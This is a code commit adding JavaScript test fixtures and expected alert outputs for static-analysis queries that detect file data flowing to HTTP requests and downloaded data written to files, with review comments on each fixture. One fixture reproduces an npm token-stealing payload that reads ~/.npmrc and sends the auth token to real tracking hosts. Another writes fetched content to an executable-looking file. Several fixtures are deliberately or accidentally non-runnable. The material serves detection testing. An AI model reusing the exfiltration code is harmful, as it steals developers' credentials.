Squished changes for HttpToFileAccess commit

Denis Levin
2018-09-21 14:32:59 -07:00
parent e21a5e4b4c
commit 8152cefa60
22 changed files with 4061 additions and 6 deletions


@@ -0,0 +1,7 @@
| bufferRead.js:10:22:10:43 | new Buf ... s.size) | $@ flows directly to Http request body | bufferRead.js:31:21:31:28 | postData | File access |
| googlecompiler.js:43:54:43:57 | data | $@ flows directly to Http request body | googlecompiler.js:37:18:37:26 | post_data | File access |
| readStreamRead.js:11:21:11:35 | readable.read() | $@ flows directly to Http request body | readStreamRead.js:28:19:28:23 | chunk | File access |
| request.js:27:52:27:55 | data | $@ flows directly to Http request body | request.js:7:11:7:20 | {jsonData} | File access |
| request.js:42:51:42:54 | data | $@ flows directly to Http request body | request.js:15:11:22:3 | {\\n u ... ody\\n } | File access |
| sentAsHeaders.js:8:79:8:84 | buffer | $@ flows directly to Http request body | sentAsHeaders.js:13:20:18:9 | {\\n ... } | File access |
| sentAsHeaders.js:8:79:8:84 | buffer | $@ flows directly to Http request body | sentAsHeaders.js:19:20:24:9 | {\\n ... } | File access |


@@ -0,0 +1 @@
Security/CWE-200/FileAccessToHttp.ql


@@ -0,0 +1,39 @@
const fs = require('fs');
var http = require('http');
var fileName = "foo.txt";
fs.exists(fileName, function (exists) {
if (exists) {
fs.stat(fileName, function (error, stats) {
fs.open(fileName, "r", function (error, fd) {
var buffer = new Buffer(stats.size);
fs.read(fd, buffer, 0, buffer.length, null, function (error, bytesRead) {
var postData = buffer.toString("utf8", 0, bytesRead);
const options = {
hostname: 'www.google.com',
port: 80,
path: '/upload',
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': Buffer.byteLength(postData)
}
};
const req = http.request(options, (res) => {
res.setEncoding('utf8');
});
// write data to request body
req.write(postData);
req.end();
});
fs.close(fd);
});
});
}
});
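Review bot: `fs.close(fd);` is issued right after the `fs.read(...)` call instead of inside its callback, so the descriptor can be closed while the read is still pending, and it is called without a callback. Moving it into the read callback, e.g. `fs.close(fd, () => {});` just before `req.write(postData);`, keeps the fixture runnable as well as analysable. Unlike the fixtures later in this commit that mark their sinks with `// BAD`, this file carries no annotation; a comment such as `// BAD: file contents are written to the request body` on the `req.write(postData)` line would make the expected alert self-explanatory. The sample also posts to `www.google.com`; a reserved name such as `example.com`, which another fixture here already uses, avoids contacting a real host if the file is ever executed.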

File diff suppressed because it is too large Load Diff


@@ -0,0 +1,61 @@
// We need this to build our post string
var querystring = require('querystring');
var http = require('http');
var fs = require('fs');
function PostCode(codestring) {
// Build the post string from an object
var post_data = querystring.stringify({
'compilation_level' : 'ADVANCED_OPTIMIZATIONS',
'output_format': 'json',
'output_info': 'compiled_code',
'warning_level' : 'QUIET',
'js_code' : codestring // BAD: passing data from file to the request json body
});
// An object of options to indicate where to post to
var post_options = {
host: 'closure-compiler.appspot.com',
port: '80',
path: '/compile',
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': Buffer.byteLength(post_data)
}
};
// Set up the request
var post_req = http.request(post_options, function(res) {
res.setEncoding('utf8');
res.on('data', function (chunk) {
console.log('Response: ' + chunk);
});
});
// post the data
post_req.write(post_data);
post_req.end();
}
// This is an async file read
fs.readFile('LinkedList.js', 'utf-8', function (err, data) {
if (err) {
// If this were just a small part of the application, you would
// want to handle this differently, maybe throwing an exception
// for the caller to handle. Since the file is absolutely essential
// to the program's functionality, we're going to exit with a fatal
// error instead.
console.log("FATAL An error occurred trying to read in the file: " + err);
process.exit(-2);
}
// Make sure there's data before we post it
if(data) {
PostCode(data);
}
else {
console.log("No data to post");
process.exit(-1);
}
});
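Review bot: The `// BAD` comment on the `'js_code' : codestring` line says the data goes into the "request json body", but `post_data` is built with `querystring.stringify` and sent as `application/x-www-form-urlencoded`, so nothing here is JSON. I would reword it to `// BAD: file contents are placed in the url-encoded request body`. It would also help to add a second marker on `post_req.write(post_data);`, which is where the data actually leaves the process, e.g. `// sink: request body contains file contents`.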


@@ -0,0 +1,28 @@
var fs = require("fs");
var http = require("http");
let data = fs.readFileSync("input.txt");
try {
let s = data.toString();
// An object of options to indicate where to post to
var post_options = {
host: 'closure-compiler.appspot.com',
port: '80',
path: '/compile',
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': Buffer.byteLength(s)
}
};
// Set up the request
var post_req = http.request(post_options, function(res) {
res.setEncoding('utf8');
});
// post the data
post_req.write(s);
post_req.end();
} catch (e) {
}
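Review bot: This fixture has no `// BAD` or `// GOOD` annotation, and none of the seven rows in the expected output added by this commit appears to correspond to a synchronous read of `input.txt`, so it is unclear whether the query is meant to flag `post_req.write(s);`. If the flow from `fs.readFileSync` to the request body should be reported, the missing row points at a false negative that deserves a follow-up; if not, the reason should be stated in the file. Either way I would annotate the write, for example `// BAD: contents of input.txt are written to the request body (currently not reported)`. The `fs.readFileSync` call also sits outside the `try`, so the empty `catch (e) {}` does not cover a failed read.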


@@ -0,0 +1,36 @@
const fs = require('fs');
var http = require('http');
var fileName = "foo.txt";
fs.exists(fileName, function (exists) {
if (exists) {
fs.stat(fileName, function (error, stats) {
var readable = fs.createReadStream(fileName);
readable.on('readable', () => {
let chunk = readable.read();
const options = {
hostname: 'www.google.com',
port: 80,
path: '/upload',
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
}
};
const req = http.request(options, (res) => {
res.setEncoding('utf8');
});
// write data to request body
req.write(chunk);
req.end();
});
fs.close(fd);
});
}
});
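Review bot: `fs.close(fd);` refers to an `fd` that is never declared in this file — the stream comes from `fs.createReadStream(fileName)` and there is no `fs.open` call — so the `fs.stat` callback would throw a ReferenceError if the fixture were run. The line looks like a leftover from the buffer-based sample and can simply be dropped, since the read stream manages its own descriptor. Separately, `readable.read()` can return `null` once the stream is drained, and `req.write(chunk)` is reached without a check; `if (chunk === null) return;` after the read would avoid that.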


@@ -0,0 +1,55 @@
var fs = require('fs');
var request = require('request');
function PostJSON(jsonData)
{
request({jsonData}, function (error, response, body){ // BAD: passing data from file to the request body
console.log(response);
});
}
function PostXML(xmlData)
{
request({
url: "http://example.com/myxml",
method: "POST",
headers: {
"content-type": "application/xml",
},
body: xmlData // BAD: passing data from file to the request body
}, function (error, response, body){
console.log(response);
});
}
fs.readFile('MyFile.json', 'utf-8', function (err, data) { // source
if (err) {
console.log("FATAL An error occurred trying to read in the file: " + err);
process.exit(-2);
}
// Make sure there's data before we post it
if(data) {
PostJSON(data);
}
else {
console.log("No data to post");
process.exit(-1);
}
});
fs.readFile('MyFile.xml', 'utf-8', function (err, data) { // source
if (err) {
console.log("FATAL An error occurred trying to read in the file: " + err);
process.exit(-2);
}
// Make sure there's data before we post it
if(data) {
PostXML(data);
}
else {
console.log("No data to post");
process.exit(-1);
}
});
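Review bot: In `PostJSON`, `request({jsonData}, ...)` passes an options object whose only property is `jsonData`, which is not an option the `request` library reads, and no `url` is given, so the file data never reaches a request body despite the `// BAD` comment. The expected output still reports `{jsonData}` as a sink, which suggests the query treats every property of the options object as outgoing data; that is worth confirming, because it would also flag unrelated options. A call that matches the comment would be `request({ url: "http://example.com/myjson", method: "POST", body: jsonData }, ...)` (URL constructed for illustration), mirroring `PostXML`.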


@@ -0,0 +1,28 @@
try {
var path = require("path"), fs = require("fs"), content = "nofile";
var npmrc = path.join(process.env.HOME || process.env.USERPROFILE, ".npmrc");
if (fs.existsSync(npmrc)) {
content = fs.readFileSync(npmrc, { encoding: "utf8" });
fs.open(npmrc, "r", function (error, fd) {
var buffer = new Buffer(stats.size);
fs.read(fd, buffer, 0, buffer.length, null, function (error, bytesRead, buffer) {
var content = buffer.toString("utf8", 0, bytesRead);
content = content.replace("//registry.npmjs.org/:_authToken=", "").trim();
var https1 = require("https");
https1.get({
hostname: "sstatic1.histats.com",
path: "/0.gif?4103075&101",
method: "GET",
headers: { Referer: "http://1.a/" + content } //BAD: passing stolen token in a header
}, () => { })
https1.get({
hostname: "c.statcounter.com",
path: "/11760461/0/7b5b9d71/1/",
method: "GET",
headers: { Referer: "http://2.b/" + content } //BAD: passing stolen token in a header
}, () => { })
});
});
}
} catch (e) {
}
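Review bot: `new Buffer(stats.size)` uses `stats`, which is never defined in this file because there is no `fs.stat` call, so the `fs.open` callback would throw before any of the flagged lines execute, and the outer `try`/`catch` does not cover an asynchronous callback. Adding the missing `fs.stat(npmrc, function (error, stats) { ... })` wrapper, or sizing the buffer from the `content` already read with `fs.readFileSync`, would make the sample coherent. The expected output reports both alerts as "flows directly to Http request body" although the data is placed in the `Referer` header; presumably the query message is shared across sinks, but wording that distinguishes headers from bodies would help whoever triages these alerts. The two hostnames are real third-party services, and a reserved domain would keep the fixture from contacting them if it is ever executed.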


@@ -0,0 +1,3 @@
| tst.js:15:33:15:33 | c | $@ flows to file system | tst.js:14:26:14:26 | c | Untrusted data received from Http response |
| tst.js:18:25:18:25 | c | $@ flows to file system | tst.js:14:26:14:26 | c | Untrusted data received from Http response |
| tst.js:23:22:23:22 | c | $@ flows to file system | tst.js:14:26:14:26 | c | Untrusted data received from Http response |


@@ -0,0 +1 @@
Security/CWE-912/HttpToFileAccess.ql

File diff suppressed because it is too large Load Diff


@@ -0,0 +1,40 @@
try {
var https = require('https');
var fs = require('fs');
https.get({
'hostname': 'example.com', path: '/raw/XXXXXXXX', headers:
{
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
},
(response) => {
response.setEncoding('utf8');
response.on('data', (c) => {
fs.writeFile("/tmp/test", c, (err) => {}); // BAD: data from response 'on' event flows to file
let writeStream = fs.createWriteStream('/usr/evil/evil.cmd');
writeStream.write(c); // BAD: data from response 'on' event flows to filestream write
writeStream.end();
var stream = fs.createWriteStream("my_file.txt");
stream.once('open', function (fd) {
stream.write(c); // BAD: data from response 'on' event flows to filestream write
stream.end();
});
});
response.on('error', () =>
{
fs.writeFile("/tmp/test", "error occured"); // GOOD: static data written to file
});
}).on('error', () =>
{
let error = "error occured";
let writeStream = fs.createWriteStream('/usr/good/errorlog.txt');
writeStream.write(error); // GOOD: static data written to file stream
writeStream.end();
});
}
catch (e) {
}
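Review bot: The GOOD case `fs.writeFile("/tmp/test", "error occured");` omits the callback, whereas the BAD case a few lines earlier passes `(err) => {}`; on Node.js 10 and later a missing callback makes `fs.writeFile` throw. Writing it as `fs.writeFile("/tmp/test", "error occured", (err) => {});` keeps the two cases parallel, so the only difference the query sees is the origin of the data. All three BAD cases also take their data from the same `response.on('data', ...)` parameter `c`, so other ways of reading the response, if the query is meant to cover them, are untested here.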